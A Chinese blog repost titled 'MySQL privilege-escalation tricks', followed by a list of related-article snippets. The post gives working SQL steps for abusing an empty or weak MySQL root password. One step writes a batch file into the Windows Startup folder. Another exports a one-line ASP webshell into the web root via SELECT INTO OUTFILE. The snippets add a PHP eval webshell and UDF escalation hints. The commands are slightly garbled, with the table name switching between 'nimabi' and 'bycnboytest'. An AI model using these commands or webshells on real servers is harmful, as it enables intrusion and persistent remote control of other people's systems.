MYSQL提权技巧

最新推荐文章于 2025-09-10 20:20:06 发布
最新推荐文章于 2025-09-10 20:20:06 发布
阅读量54 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/mujj/articles/1961521.html

问题对象:有虚拟主机空间商.网站服务器 
过程:建立一个表→在表中输入我们的提权内容→出表→完成 
1.mysql默认开启3306端口.如果服务器默认密码不设置就是空密码.黑客们就可能利用该弱口令漏洞.来攻击我们的服务器. 
2.如果在得到用户名为:root 密码为:(空密码时候),黑客就可以攻击进我们网站的.答案他们利用导出一句话木马. 
3.黑客可以得到一个webshell然后.查看网站配置信息.就可以找到这个账号和密码.例如inc.php coon.asp等这些文件 
4.虚拟主机提供商,自己给我们的mysql账号和密码. 

一 
创建新表,开机自启动,来得到cmd,其命令如下: 
1:创建一个新的表 
create table nimabi (cmd text); 
含义:创建了一个新的表,表名为bycnboytest,表中只存放一个字段,字段名为cmd,为text文本]

2:运行我们的后门木马之类的东西.大家自己灵活.

insert into nimabi values ("(路径)c:\cmd11.exe " );

3:输出表为一个bat的脚本文件 
select * from bycnboytest into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\54td.bat"; 
导出一个文件文:54td.bat(c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\此路径才为开机自启动) 

二 

导出一句木马类:  

执行:show databases; 看服务器中有些什么数据库  

use test;进入数据库  

show tables;查看我们进入数据库中有些什么数据表


create table nimabi (cmd text); 创建一个新的表 
insert into nimabi values ("<%execute request("textarea1")%> " );在表中插入一句话木马内容


select * from nimabi into outfile "(导出到网站物理路径如):D:\www\web\54td.asp";

转载于:https://www.cnblogs.com/mujj/articles/1961521.html

phpmyadmin mysql_Mysql+PHPmyadmin 技巧
weixin_32338107的博客
01-26 285
软件安装:装机软件必备包随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。1:phpmyadmin后台拿webshellphpmyadmin爆路径方法:weburl+phpmyadmin/themes/darkblue_orange/layout.inc.phphttp://url...
mysql大马下载_Mysql 
weixin_34254044的博客
02-02 787
==============================================mysql udf ==============================================版本的区分MYSQL < 4.1在MYSQL 4.1以前的版本中,可以将所有的DLL文件里面的任何函数都注册到MYSQL里面以供MYSQL调用。无论这个DLL在什么位置,函数的声明是什么...
渗透测试工程师面试题大全(二)
w1304099880的博客
04-22 1万+
渗透测试工程师面试题大全(二) from:backlion大佬 整理 51.sql 注入写文件都有哪些函数? (1)select ‘一句话’ into outfile ‘路径’ (2)select ‘一句话’ into dumpfile ‘路径’ (3) select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu....
3306-批量Mysql_MYSQL技巧 分享
weixin_31940835的博客
02-15 124
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
phpmyadmin mysql_phpMyadmin技巧
weixin_26795171的博客
01-28 540
定义phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。环境准备目标:WindowsServer2003Enterprisex64Edition192.168.17.137攻击机:window7192.168.17.132Php:5.45Mysql:5.5.53Apac...
mysql技巧
https://www.cnblogs.com/zpchcbd/
08-05 314
不会免杀 对于udf的话 市面上的udf.dll udf的脚本基本遇到360之类的杀毒软件都GG思密达 但是可能能通过以下方法来绕过:将自己要php脚本后缀修改为csproj 然后再通过包含文件 ...
MySQL
热门推荐
Grey的博客
05-12 3万+
一、Mysql必备条件1.服务器安装Mysql数据库利用Mysql的前就是服务器安装了mysql数据库,且mysql的服务没有降Mysql数据库默认安装是以系统限继承的,并且需要获取Mysql root账号密码。2.判断Mysql服务运行限对于Mysql数据库服务运行限有很多方法,我这里主要介绍三种,一种是通过查看系统账号,也即使用“net user”命令查看系统当前账号,如果...
MYSQL
weixin_46626159的博客
03-19 5316
MYSQL udf 一.获取网站限 1.本地搭建pikachu靶场测试,文件上传漏洞获取webshell (1)简单的前端检测文件类型 (2)直接审查前端源代码,给它删了 (3)上传php后门代码 (4)冰蝎连接后门获取webshell 二.UDF 1.UDF知识点: (1)读取网站数据库配置文件(了解其命名规则及查找技巧) sql data inc config conn database common include等 (2)读取数据库存储或备.
mysql linux udf,mysql udf原理和案例分析 udf木马下载
weixin_32538033的博客
05-03 355
本文将详细讲述udf的原理及具体方法 您可以使用下面供的 langouster_udf.dll 专用网马(php)或者使用 php spider shell最新版(已去后门)--非常强大的PHP大马 里面的udf功能上传udf.php到目标站点访问 下面是udf马的界面进入之后.安装下面是这款udf.php马可以安装的function用法和说明一、功能:利用MYSQL的Cre...
mysqludf
09-20
在网络安全领域,"mysqludf"常常指的是利用UDF进行升的技巧,这对于渗透测试和系统安全评估至关重要。 MySQL通常涉及以下步骤: 1. **UDF编译与注入**:首先,你需要编写或找到一个能够执行系统命令...
mysql4大招数mysql4大招数
06-02
### MySQL 四大技巧详解 在安全领域,MySQL 技术是渗透测试人员常用的一种手段,通过对 MySQL 数据库服务器的漏洞利用,实现从数据库层面获取更高级别的系统限。本文将详细阐述 MySQL 的四种常见方法...
mysql技巧:四大实用方法
本文主要探讨了MySQL的四种策略,针对不同操作系统环境下的安全威胁和利用方法。以下是详细的阐述: 1. UDF(User Defined Functions)限利用 UDF是MySQL中的自定义函数,通过创建名为`cmdshell`的函数,允许...
Mysql技巧揭秘:Udf与Mof方法详解
Mysql是指在拥有Webshell但限受限的情况下,通过技巧升Webshell的限,使其能够获得服务器级别的访问。讲座首先定义了什么是mysql数据库,并强调了如何寻找并利用最高限账户(如root)的密码。通过学习...
基于SpringBoot和uni-app开发的陪诊陪护软件系统源码
程序员创业中
09-06 1500
中国60岁以上人口已突破3.1亿,独居老人超1.3亿,而一线城市三甲医院日均门诊量超万人次。在这组数据背后,是无数家庭面临的困境:子女异地工作无法陪同父母就医,独居老人因不会操作智能设备在挂号机前徘徊,异地患者因不熟悉流程在医院迷路……当“就医”从个人事务演变为社会难题,陪诊陪护系统正以“专业服务+技术赋能”的双重模式,成为破解这一困局的关键。
从Java全栈开发到微服务架构的实战经验分享
CatchLight的博客
09-09 778
应聘者:我认为最重要的是能够理解业务需求,并将其转化为技术方案。同时,持续学习新技术,保持对行业趋势的关注也很关键。毕竟,技术更新很快,只有不断学习才能跟上节奏。通过这次面试,我们可以看到一位资深Java全栈开发者的专业能力和实践经验。他不仅掌握了多种技术栈,还能在实际业务场景中灵活运用,解决实际问题。同时,他也展现了良好的沟通能力和学习能力,这些都是成为一名优秀工程师的关键素质。
Date、BigDecimal类型值转换
2301_81922209的博客
09-06 447
本文展示了前后端数据交互中日期和数值类型的转换处理。前端输入JSON数据包含日期字符串(yyyy-MM-dd和yyyy/MM/dd格式)和数值,后端通过@JsonFormat注解自动转换为Date类型,BigDecimal类型则用于精确计算。数据库中存储datetime和decimal类型数据。后端处理时,使用工具类对价格和利率进行格式化:价格保留两位小数(四舍五入),利率转换为百分比格式。最终响应数据将日期转为时间戳或格式化字符串,数值转为格式化字符串,并转换支付方式编码为描述文本。完整流程涵盖数据接收、
Redis哨兵
最新发布
2502_92141759的博客
09-10 455
哨兵的结构如图::Sentinel 会不断检查您的master和slave是否按预期工作:如果master故障,Sentinel会将一个slave升为master。当故障实例恢复后也以新的master为主:Sentinel充当Redis客户端的服务发现来源,当集群发生故障转移时,会将最新信息推送给Redis的客户端。
SAP HANA Scale-out 03:Performance Guide
SAP攻城狮
09-10 941
HEX EngineThe SAP HANA Execution Engine (HEX)是一个查询执行引擎,从长远来看将取代其他SAP HANA引擎,如连接引擎和OLAP引擎.所有功能都整合在HEX中,从而消除不同引擎之间的物化过程。HEX引擎通过在准备阶段创建适当的SQL计划来连接SQL层和存储层。HEX引擎中的数据是流式处理的,因此可以快速获取第一批结果行,而无需等待所有结果行都被处理。HEX引擎中的操作符是管道化的,改进了并行化并可以减少内存消耗。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值